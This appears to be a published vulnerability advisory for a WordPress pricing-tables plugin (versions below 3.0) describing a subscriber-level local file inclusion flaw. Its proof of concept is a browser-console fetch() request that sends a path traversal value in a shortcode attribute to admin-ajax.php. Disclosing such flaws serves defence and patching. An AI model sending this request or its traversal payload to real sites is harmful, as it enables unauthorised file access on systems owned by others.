WordPress Plugin Vulnerabilities

Pricing Tables For WPBakery Page Builder < 3.0 - Subscriber+ LFI

Description

The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[vca_pricing_plans_child vca_pp_styles='/../../../../index']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

References

Classification

Type
TRAVERSAL
OWASP top 10
CWE
CVSS

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-03-22 (about 1 years ago)
Added
2023-03-22 (about 1 years ago)
Last Updated
2023-03-22 (about 1 years ago)

Other